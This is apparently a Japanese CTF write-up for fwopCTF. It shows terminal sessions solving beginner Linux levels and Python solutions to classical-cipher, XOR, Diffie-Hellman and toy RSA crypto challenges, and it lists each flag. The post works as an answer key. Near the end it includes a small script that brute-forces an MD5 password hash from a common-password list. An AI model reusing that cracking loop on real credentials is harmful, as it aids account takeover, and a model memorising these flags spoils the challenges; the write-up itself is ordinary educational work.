-r--r--r--  1 level2 level2  807 Apr 18  2019 .profile
-r--r--r--  1 root   root     23 Oct 18 00:19 flag.txt
level2@fweefwoplinux:~$ cat flag.txt
fwopCTF{level_3_ti8fx}

fwopCTF{level_3_ti8fx}

Linux Lab Level 4 (Linux 100)

$ ssh level3@linux.fweefwop.club
level3@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:34:45 2021 from 79.95.87.35
level3@fweefwoplinux:~$ ls -lRa
.:
total 20
dr-x------  2 level3 level3 4096 Oct 18 00:20 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level3 level3  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level3 level3 3564 Oct 18 00:20 .bashrc
-r--r--r--  1 level3 level3  807 Apr 18  2019 .profile
level3@fweefwoplinux:~$ env | grep fwop
FLAG=fwopCTF{level_4_nmc4e}

fwopCTF{level_4_nmc4e}

Linux Lab Level 5 (Linux 100)

$ ssh level4@linux.fweefwop.club
level4@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:43:50 2021 from 79.95.87.35
level4@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  3 level4 level4 4096 Oct 18 00:24 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level4 level4  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level4 level4 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level4 level4  807 Apr 18  2019 .profile
dr-xr-xr-x  3 root   root   4096 Oct 18 00:25 pneumonoultramicroscopicsilicovolcanoconiosis

./pneumonoultramicroscopicsilicovolcanoconiosis:
total 12
dr-xr-xr-x 3 root   root   4096 Oct 18 00:25 .
dr-x------ 3 level4 level4 4096 Oct 18 00:24 ..
dr-xr-xr-x 3 root   root   4096 Oct 18 00:27 hippopotomonstrosesquippedaliophobia

./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia:
total 12
dr-xr-xr-x 3 root root 4096 Oct 18 00:27 .
dr-xr-xr-x 3 root root 4096 Oct 18 00:25 ..
dr-xr-xr-x 2 root root 4096 Oct 18 00:27 really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here

./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia/really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here:
total 12
dr-xr-xr-x 2 root root 4096 Oct 18 00:27 .
dr-xr-xr-x 3 root root 4096 Oct 18 00:27 ..
-r--r--r-- 1 root root   21 Oct 18 00:27 flag
level4@fweefwoplinux:~$ cat ./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia/really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here/flag
fwopCTF{level_5_4gw}

fwopCTF{level_5_4gw}

Linux Lab Level 6 (Linux 100)

$ ssh level5@linux.fweefwop.club
level5@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:45:27 2021 from 79.95.87.35
level5@fweefwoplinux:~$ ls -lRa
.:
total 1504
dr-x------  2 level5 level5    4096 Oct 18 00:35 .
drwxr-xr-x 15 root   root      4096 Oct 18 00:12 ..
-r--r--r--  1 level5 level5     220 Apr 18  2019 .bash_logout
-r--r--r--  1 level5 level5    3526 Apr 18  2019 .bashrc
-r--r--r--  1 level5 level5     807 Apr 18  2019 .profile
-r--r--r--  1 root   root   1518096 Oct 18 00:35 flag.txt
level5@fweefwoplinux:~$ cat flag.txt | grep fwop
Urna nunc id cursus metus aliquam eleifend mi in. Magna sit amet purus gravida. Facilisi etiam dignissim diam quis enim. Quis viverra nibh cras pulvinar mattis nunc sed. fwopCTF{level_6_3bw} Viverra adipiscing at in tellus integer feugiat scelerisque. Enim diam vulputate ut pharetra sit amet. Ut tristique et egestas quis ipsum suspendisse ultrices gravida. Arcu bibendum at varius vel pharetra. Ut faucibus pulvinar elementum integer enim neque volutpat. Viverra maecenas accumsan lacus vel facilisis volutpat est velit egestas. Vitae turpis massa sed elementum. Lacinia at quis risus sed vulputate odio ut enim. Scelerisque varius morbi enim nunc faucibus. Tellus in metus vulputate eu scelerisque felis imperdiet proin fermentum. Phasellus faucibus scelerisque eleifend donec pretium vulputate sapien nec sagittis. Nec sagittis aliquam malesuada bibendum arcu vitae elementum curabitur vitae. Urna molestie at elementum eu facilisis sed. Ac tortor vitae purus faucibus. Arcu odio ut sem nulla pharetra diam sit amet nisl. In aliquam sem fringilla ut morbi tincidunt augue interdum.

fwopCTF{level_6_3bw}

Linux Lab Level 7 (Linux 100)

$ ssh level6@linux.fweefwop.club
level6@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:53:42 2021 from 79.95.87.35
level6@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level6 level6 4096 Oct 18 00:36 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level6 level6  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level6 level6 3526 Apr 18  2019 .bashrc
-r--r--r--  1 root   root     21 Oct 18 00:36 .flag.txt
-r--r--r--  1 level6 level6  807 Apr 18  2019 .profile
level6@fweefwoplinux:~$ cat .flag.txt
fwopCTF{level_7_82j}

fwopCTF{level_7_82j}

Linux Lab Level 8 (Linux 100)

$ ssh level7@linux.fweefwop.club
level7@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:55:06 2021 from 79.95.87.35
level7@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level7 level7 4096 Oct 18 00:42 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level7 level7  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level7 level7 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level7 level7  807 Apr 18  2019 .profile
-r--r--r--  1 root   root     21 Oct 18 00:43 flag.png
level7@fweefwoplinux:~$ file flag.png
flag.png: ASCII text
level7@fweefwoplinux:~$ cat flag.png
fwopCTF{level_8_2b3}

fwopCTF{level_8_2b3}

Linux Lab Level 9 (Linux 100)

$ ssh level8@linux.fweefwop.club
level8@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:25:07 2021 from 90.152.192.27
level8@fweefwoplinux:~$ ls -lRa
.:
total 436
dr-x------  2 level8 level8   4096 Oct 18 00:30 .
drwxr-xr-x 15 root   root     4096 Oct 18 00:12 ..
-r--r--r--  1 level8 level8    220 Apr 18  2019 .bash_logout
-r--r--r--  1 level8 level8   3526 Apr 18  2019 .bashrc
-r--r--r--  1 level8 level8    807 Apr 18  2019 .profile
-r--r--r--  1 root   root   210000 Oct 18 00:30 f1.txt
-r--r--r--  1 root   root   210021 Oct 18 00:30 f2.txt
level8@fweefwoplinux:~$ diff f1.txt f2.txt
1773a1774
> fwopCTF{level_9_c2p}

fwopCTF{level_9_c2p}

Linux Lab Level 10 (Linux 100)

$ ssh level9@linux.fweefwop.club
level9@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:29:34 2021 from 90.152.192.27
level9@fweefwoplinux:~$ ls -lRa
.:
total 24
-r--r--r--  1 root   root     22 Oct 18 01:05 -cant_touch_this
dr-x------  2 level9 level9 4096 Oct 18 01:05 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level9 level9  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level9 level9 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level9 level9  807 Apr 18  2019 .profile
level9@fweefwoplinux:~$ cat ./-cant_touch_this 
fwopCTF{level_10_fqd}

fwopCTF{level_10_fqd}

Linux Lab Level 11 (Linux 100)

$ ssh level10@linux.fweefwop.club
level10@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 14:06:37 2021 from 37.192.231.16
level10@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level10 level10 4096 Oct 23 03:13 .
drwxr-xr-x 15 root    root    4096 Oct 18 00:12 ..
-r--r--r--  1 level10 level10  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level10 level10 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level10 level10  807 Apr 18  2019 .profile
-rw-r--r--  1 root    root      54 Oct 23 03:13 readme
level10@fweefwoplinux:~$ cat readme 
Level 11 password is in a file named level11_flag.txt
level10@fweefwoplinux:~$ find / -name level11_flag.txt
find: ‘/lost+found’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
       :
find: ‘/proc/30761/fdinfo’: Permission denied
find: ‘/proc/30761/ns’: Permission denied
/usr/local/share/man/level11_flag.txt
find: ‘/etc/ssl/private’: Permission denied
find: ‘/root’: Permission denied
find: ‘/run/chrony’: Permission denied
       :
level10@fweefwoplinux:~$ cat /usr/local/share/man/level11_flag.txt
fwopCTF{level_11_87h}

fwopCTF{level_11_87h}

Caesar (Crypto 100)

シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 16:
fwopCTF{Brutus_says_Ceaser_sucks}
fwopCTF{Brutus_says_Ceaser_sucks}

Some Ciphers (Crypto 100)

ROT13。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Use Caesar Cipher to decode this: Brxu iodj lv: izrsFWI{pxowl_flskhu_vkhqdqljdqv}

さらに"Brxu"以降をhttps://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 3:
Your flag is: fwopCTF{multi_cipher_shenanigans}
fwopCTF{multi_cipher_shenanigans}

Simple MD5 (Crypto 100)

指定の文字列のMD5の値を答える。

$ echo -n "Happy as a Clam" | md5sum
7ca2197c58b026825c382e32621b1ce4  -
||
>|
<b>7ca2197c58b026825c382e32621b1ce4</b>
|<

* Oink (Crypto 100)
Pigpen cipher。https://www.dcode.fr/pigpen-cipherで復号する。
>|
<b>WELOVEPIGS</b>
|<

* FlipFwop (Crypto 100)
鏡文字になっているので、左右反転する。
>|
<b>fwopCTF{earth_fire_water_air}</b>
|<

* Where's the message? (Crypto 100)
意味のあるよう取り出す文字を調整しながら、アルファベット大文字だけ並べる。
>|
<b>WOWTHANKS</b>
|<

* WireBirds (Crypto 100)
https://www.gagb.org.uk/puzzles.php#gsc.tab=0にある「Birds on a Wire」を参考に復号する。
>|
<b>birdsknow</b>
|<

* More than 64 (Crypto 125)
base85デコードする。
>||
>>> import base64
>>> enc = "Ap8046W?O%DffZ(EaN9aF(KE\"GAhV?A7'P!Ebf$(Df9!#Dff?$F`VY32Dfg"
>>> base64.a85decode(enc)
b'fwopCTF{other_bases_would_work_too_not_just_64}'

fwopCTF{other_bases_would_work_too_not_just_64}

Samuel Morse (Crypto 150)

モールス信号。https://morsecode.world/international/translator.htmlでデコードする。

MORSE CODE EASY
morse_code_easy

ROT More (Crypto 150)

rot47。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

fwopCTF{r0t47_t_is}

Hebrew Texts (Crypto 200)

Atbash cipher。https://www.geocachingtoolbox.com/index.php?lang=en&page=atbashCipherで復号する。

fwopCTF{the_water_in_the_black_sea_is_too_salty_aUdhEUjIhO}

Capture the flags (Crypto 200)

国際信号旗https://ja.wikipedia.org/wiki/%E5%9B%BD%E9%9A%9B%E4%BF%A1%E5%8F%B7%E6%97%97を参考に復号する。

EUREKA8891

5x5 (Crypto 200)

ポリビュオスの暗号表にあてはめ、復号する。

fwopCTF{polybius_square}

talking in the wind (Crypto 200)

Navajo Code。https://www.dcode.fr/navajo-codeで復号する。

fwopCTF{come_from_the_wind}

Did you take biology? (Crypto 200)

Codons。https://www.dcode.fr/codons-genetic-codeで復号する。

DNARNAGENES

Touch and feel (Crypto 200)

点字https://ja.wikipedia.org/wiki/%E8%8B%B1%E8%AA%9E%E3%81%AE%E7%82%B9%E5%AD%97を参考に復号する。

fwopCTF{braille_fun}

Baby RSA (0) (Crypto 200)

文字列を数値化する。

from Crypto.Util.number import *

s = 'fwopCTF{I_am_learning_RSA_so_exciting}'
ans = bytes_to_long(s)
print ans

13045502302425615144883543017919348302961367754511098998678884785553997741250139993469249405

Baby RSA (1) (Crypto 150)

数値を文字列化する。

from Crypto.Util.number import *

m = 643192922209641529679217093842090563198908934967463878287741
flag = long_to_bytes(m)
print flag

fwopCTF{another_baby_rsa}

Baby RSA (2) (Crypto 100)

p * qを求める。

p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
n = p * q
print n

56128199547956677238767298622332803823913995062683233044001500290070667830063

Baby RSA (3) (Crypto 100)

(p - 1) * (q - 1)を求める。

p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
phi = (p - 1) * (q - 1)
print phi

56128199547956677238767298622332803823430928948082558447308185662138795433600

Baby RSA (4) (Crypto 200)

RSA暗号を行う。

from Crypto.Util.number import *

p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537

s = 'fwop{baby_rsa}'
m = bytes_to_long(s)
c = pow(m, e, p * q)
print c

16832067193038570664627710532871887598013604871431045374089410572330773390687

Baby RSA (5) (Crypto 100)

inverseを使ってdを算出する。

from Crypto.Util.number import *

p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
print d

39365191632547732007914614856903809984286421688048990897845086680417895132673

Baby RSA (6) (Crypto 200)

RSA暗号だが、p, qがわかっているので、通常通り復号する。

from Crypto.Util.number import *

p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537
enc = 5052002876272730069345319419734444235143011589416753056749825264763216780757

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(enc, d, p * q)
flag = long_to_bytes(m)
print flag

fwopCTF{how_many_more_baby_rsa?}

2B, or not 2B! (Crypto 200)

hexデコードする。

>>> s = '2b2b2b2b2b2b2b2b2b2b5b3e2b3e2b2b2b3e2b2b2b2b2b2b2b3e2b2b2b2b2b2b2b2b2b2b3c3c3c3c2d5d3e3e3e3e2b2b2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2e2b2e3c2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2e3e2b2b2b2b2b2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2b2b2b2b2e3e2d2d2d2d2d2d2d2d2d2d2d2d2e2d2d2e2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2d2d2d2d2e2b2e2b2b2b2b2b2e2d2d2d2d2d2d2d2e2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2e2b2b2b2b2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2b2b2b2e3e2d2e2d2d2d2e2b2b2b2b2b2e2e3c2b2b2b2b2b2b2e3e2d2d2d2d2d2d2e3c2d2d2d2d2d2d2e3e2d2d2d2d2d2e2b2b2b2b2b2e3c2e3e2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2e2d2d2d2e2d2d2d2d2d2d2e3e2d2e2b2e3c2b2b2e3e2e3c2b2b2b2b2e2d2d2d2d2d2d2e3e2d2d2d2d2d2e3c2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2e3e2d2d2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2e2d2e2d2d2d2d2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e'
>>> s.decode('hex')
'++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++.+++++++++++++++++.--------.+.<---.+++++++++++++++++.--------------.>+++++++++++.<+++++++++++++.>------------.--.--------.+++++++++++++++.------------.+.+++++.-------.--------.++++++++++.++++++++++.<++++++++++++.>-.---.+++++..<++++++.>------.<------.>-----.+++++.<.>++++++.<+++++++++.---.------.>-.+.<++.>.<++++.------.>-----.<+++++++.-------.---------------------------.>----------.+++++++++.-.------------.+++++++++++++++++.-------.++++++++++++++++++.'

Brainf*ck言語のようだ。https://sange.fi/esoteric/brainfuck/impl/interp/i.htmlで実行する。

fwopCTF{Something_is_rotten_in_the_state_of_Denmark}

Silly Secret Sharing (SSS) (Crypto 200)

2人でSSSを使っているので、一次方程式のグラフを使う。方程式を解き、その切片がPINになる。

from sympy import *

p1 = (20, 161013)
p2 = (10, 122673)

a = symbols('a')
b = symbols('b')

eq1 = Eq(a * p1[0] + b, p1[1])
eq2 = Eq(a * p2[0] + b, p2[1])
sol = solve ([eq1, eq2], [a, b])
pin = sol[b]
print pin

84333

Unbreakable (Crypto 250)

$ echo V3Z4bHd2IGdzdiB1bG9vbGRybXQgaGdpcm10CkVUc29SVjFWTUhZbEJDTWxSU0FzeVNFb1JUOW5SU0lsQUhZbnlUVW1SVG9hUldRc04yRXFNcUIwTFd0NE1Xd29NYXA0QmFSNUFHQXJNR1pkQkdVckIyTjJPWFkzekNJbFJUQTN5M1lXRVZBN3VIWXN4bjkxeW5KdHpDSmY= | base64 -d
Wvxlwv gsv ulooldrmt hgirmt
ETsoRV1VMHYlBCMlRSAsySEoRT9nRSIlAHYnyTUmRToaRWQsN2EqMqB0LWt4MWwoMap4BaR5AGArMGZdBGUrB2N2OXY3zCIlRTA3y3YWEVA7uHYsxn91ynJtzCJf

Atbash cipher。https://www.geocachingtoolbox.com/index.php?lang=en&page=atbashCipherで復号する。

Decode the following string
VGhlIE1ENSBoYXNoIHZhbHVlIG9mIHRoZSBmbGFnIGlzIDJhM2VjNjY0ODg4NDdlNzk4YzI5ZTZiNTAwYTFiY2M2LCB3aXRoIGZ3b3BDVEZ7fSBhcm91bmQgaXQu
$ echo VGhlIE1ENSBoYXNoIHZhbHVlIG9mIHRoZSBmbGFnIGlzIDJhM2VjNjY0ODg4NDdlNzk4YzI5ZTZiNTAwYTFiY2M2LCB3aXRoIGZ3b3BDVEZ7fSBhcm91bmQgaXQu | base64 -d
The MD5 hash value of the flag is 2a3ec66488847e798c29e6b500a1bcc6, with fwopCTF{} around it.

このmd5をCrackStationでクラックする。

antidisestablishmentarianism
fwopCTF{antidisestablishmentarianism}

My mind is all blanks (Crypto 250)

"\x09"と"\x20"の文字だけがある。"\x09"を"0"、"\x20"を"1"に置換し、デコードする。ASCIIコードの羅列になるので、さらにデコードする。

with open('blanks.txt', 'r') as f:
    data = f.read()

data = data.replace('\x09', '0')
data = data.replace('\x20', '1')

codes = ''
for i in range(0, len(data), 8):
    codes += chr(int(data[i:i+8], 2))

codes = map(int, codes.split(','))

flag = ''
for code in codes:
    flag += chr(code)
print flag

fwopCTF{tab_tap_tab_top}

This is just ridiculous! (Crypto 300)

CyberChefで以下のレシピで復号する。

・From Base64
・From Binary
・From Base64
・From Hex
・From Base64

f:id:satou-y:20211105210905p:plain

fwopCTF{so_many_steps}

Ballyshannon (Crypto 300)

Ogham Alphabet。https://peatfirejewelry.com/blog/ogham-language-and-alphabet/を参考に復号する。

OGHAM

Borg (Crypto 300)

keyは2バイトのXOR暗号と推測できる。

enc = [0xcc, 0xdd, 0xc5, 0xda, 0xe9, 0xfe, 0xec, 0xd1, 0xd8, 0xcf, 0xd9, 0xc3,
    0xd9, 0xde, 0xcb, 0xc4, 0xc9, 0xcf, 0xf5, 0xc3, 0xd9, 0xf5, 0xcc, 0xdf,
    0xde, 0xc3, 0xc6, 0xcf, 0xd7]

flag_head = 'fwop'
key = []
for i in range(len(flag_head)):
    key.append(ord(flag_head[i]) ^ enc[i])

assert key[:2] == key[2:]
key = key[:2]

flag = ''
for i in range(len(enc)):
    flag += chr(enc[i] ^ key[i%len(key)])
print flag

fwopCTF{resistance_is_futile}

Beep Boop (Crypto 300)

Sonic Visualiserで開くと、モールス信号が見える。
f:id:satou-y:20211105211251p:plain

..-. .-- --- .--. -.-. - ..-. -... . . .--. -... . . .--. .. -- .- ... .... . . .--. ..--- ---.. ....- ----.

https://morsecode.world/international/translator.htmlでデコードする。

FWOPCTFBEEPBEEPIMASHEEP2849
fwopCTF{beep_beep_im_a_sheep_2849}

Toddler RSA (Crypto 300)

nをfactordbで素因数分解する。

n = 6072510988286929264894086362835077173625040072601309544494353950350290130736379974160352667353769493236336930449438771170009858935018137670526822423479179 * 7997416035266735376949323633693044943877117000985893501813767052682242347917960725109882869292648940863628350771736250400726013095444943539503502901307363

あとはそのまま復号する。

from Crypto.Util.number import *

n = 48564396752059338791464352725210493148212425902751190745668164451763507023284970474595680869078726765719920168392505794415687815488076204724659643390252172928332322944711949999326843460702414647825442748821062427474599006915155109396213406624079900714394311217571510958430682853948004734434233860146109894977 
e = 31337
enc = 41150528980309124566759211353926954600326212451943427970714522842710817302495300068872479882906452508829057279560763667181476082807039520594933172924095664670761580311804814234298908677404942630507776935683606361298186524479302515125123817250737921124161083117345688744816192619093876226182512278538279004036

p = 6072510988286929264894086362835077173625040072601309544494353950350290130736379974160352667353769493236336930449438771170009858935018137670526822423479179
q = 7997416035266735376949323633693044943877117000985893501813767052682242347917960725109882869292648940863628350771736250400726013095444943539503502901307363

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(enc, d, n)
flag = long_to_bytes(m)
print flag

fwopCTF{cute_toddler_rsa}

Elementary, My Dear Watson (Crypto 300)

踊る人形の暗号。https://www.dcode.fr/dancing-men-cipherで復号する。

You know my methods Watson
fwopCTF{You_know_my_methods_Watson}

Open Secret (Crypto 300)

A = pow(g, a, p)
B = pow(g, b, p)

bの秘密鍵がわかっているので、共有鍵を以下で計算できる。

key = pow(g, a * b, p) = pow(pow(g, a, p), b, p) = pow(A, b, p)

あとはXORで復号する。

from Crypto.Util.number import *

enc = 'T6ZBVGqFaF9gjkhLXL9Ke125S3tIvUdBR45GTVqOQEVEtHFNWo5eRVy9Uw=='.decode('base64')

p = 824717393
g = 150357959
A = 734947628

b = 845023462
B = pow(g, b, p)

key = pow(A, b, p)
s_key = long_to_bytes(key)

flag = ''
for i in range(len(enc)):
    flag += chr(ord(enc[i]) ^ ord(s_key[i%len(s_key)]))
print flag

fwopCTF{I_found_the_alien_his_name_is_paul}

Pretty Safe Password (Crypto 300)

ブルートフォースでパスワードを求める。

import hashlib

with open('10k-most-common.txt', 'r') as f:
    words = f.read().splitlines()

for word in words:
    password = 'fwopCTF{%s}' % word
    h = hashlib.md5(password).hexdigest()
    if h == '3777de3a24c77814c1e4e27aeb9e40e3':
        print password
        break

fwopCTF{pa55word}

Home Run (Crypto 350)

CyberChefで以下のレシピで復号する。

・From Base64
・From Base64
・From Base64
・From Binary
・From Hex
・From Base32

f:id:satou-y:20211105211745p:plain

fwopCTF{running_around_the_bases_456789}

Elementary RSA (Crypto 350)

n, qがわかっているので、pを算出できる。あとはそのまま復号する。

from Crypto.Util.number import *

c = 7547565125898378215297051739440246888835869128178814602128398471744328137846645196352789690502829388481328147506940018807183449257834243707849773598414393305253794845257619586242775698697470314118958662932787038546427248055484396055575105135110971290111917998933205130176836472894218594817189395314880103599436146900262227720584244587872516862458558944038921270858082562381938645818571307807059350434544612575270526939881886666213772988313967785602967403463328683642452412570738638011516486964398202827383201545380219462136633609360170379918362441554815623555045825134255750316711554991895782546314094842951837239221
e = 65537
n = 13715280123196571296040497170215424559841118434271081143085393254503221402455218866367322935884205486745414412072737147619005701422821619176312036264040746835557434946118113454705949958288089469537242690516793314691009138099296393081195700382103932212016949324612763350891225015815072676716589951974500241683728451552619937957018532227780090226646421633572025828452979286761778535053778685371789594887586906300906069495398868677875457680655416855327598433514199221642516967512865226196097662282605095102549022089757838743887028753811567234292303888034615388451343532612361239809487469031081253702053913483627342967513
q = 138295817899027125589939386105258578479159740431881274316292285949477631403445673197617716066873262776020799538878278844875145015704122766147923557098420440559040775768532377541317308499486891858654315671171927898037446605115409768580966408482758441823375862061789309173422687582436899562827562898907601960829

assert n % q == 0

p = n // q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print flag

fwopCT{don't_be_so_clumsy}

フラグの形式を修正する。

fwopCTF{don't_be_so_clumsy}

Ave Maria (Crypto 400)

Trithemius Ave Maria Cipher。https://www.dcode.fr/trithemius-ave-mariaでデコードする。

LEARNYOURLATIN

Kinder RSA (Crypto 400)

RSAのパラメータがそろっているので、そのまま復号する。

from Crypto.Util.number import *

p = 117025919863324186220155912379493510806938956278523335096778026828600895382729413686432125512416987242961255888204400422166767227569280578840187401896714137293001805171341988321852662908122640026581641142465496641866004143100724149516317767459196996302881487013468733667218264219949378827091463411801040433333
e = 65537
c = 3176947916522045759269309860247477806969078544628032431086054916430409561492643390296727934584958799568295039721459221273731800678329151618879869923278910592515839775128584789876977122269445555178438315335177456488472866165828523483080654047393581475909777710523063691395238952705004953255824614927142500947607632610806109942257461826838758244571120945151163127971358262552910600456763503073429250752505495874926777120685874043361508768889445750979867041183999386035611654705651426768594305162794625276466933203875604190503709758422736145157145383125237582611020912918611460533424111536366894528559932701001420239552
n = 10682780633991969177677032196019939027985208229946310919966442519465032181529225488298110788841863113629067354740714072936547257627785850653093685942691560550065001809296374399373377762142325828132422097371522127911728321208614509277335352830189983100178132982012599369846533458595399722731354088854256306846226824731309968110658509633139142049891064431405878186536015671444740708232423766875328640331661803993022425821117080195996399180194864792793387232822578898138983860268605248897408399776140269518083235613918473829364123401722919836036448967473751808918526526887166533489699341809254472381445194313968211679501
d = 8349870118806759862772265655143222556854025841570407203187222760571833826675535585059900898094579214728305769971055714881282836748452480273810581235246886326458027033297324848679391425694502960863074628650323038928823157207551127420106252173985411054925078383258241950659759775646571414573654778240677469493374709546552017058197814263099082949885338486829565261098097424038912450740413892281133896808838467269433631566299466640664843204006072812868977520672537372503857475581013879592069870672135240300086821446969927789617435024923930106366843309026147286983416006068948362159060850750634615509439576603194180447073
q = 91285594221079416032103777163267879510959473929712713487338945167858596955609331062421703786334194408687389318748343117328864181792085064377910816336971021816498260521315839846898184613459752604302179787801085385679518199989894907975205676468500840003987942953430961153503606127238899378811680500145951061497
t = 10682780633991969177677032196019939027985208229946310919966442519465032181529225488298110788841863113629067354740714072936547257627785850653093685942691560550065001809296374399373377762142325828132422097371522127911728321208614509277335352830189983100178132982012599369846533458595399722731354088854256306846018513217225564508406249943596380659573166001197642137951898699448281215894085022126474811032910622341373780614164336656500767770833499149575289014588893739029483794575947420728657552254557876887199414683651891801818601058632300778544925523546053972611657096920266838668977471462066194175542050402021220184672

assert n == p * q
assert t == (p - 1) * (q - 1)
assert d == inverse(e, t)

m = pow(c, d, n)
flag = long_to_bytes(m)
print flag

fwopCTF{oh_no_my_information}

Strange RSA (Crypto 400)

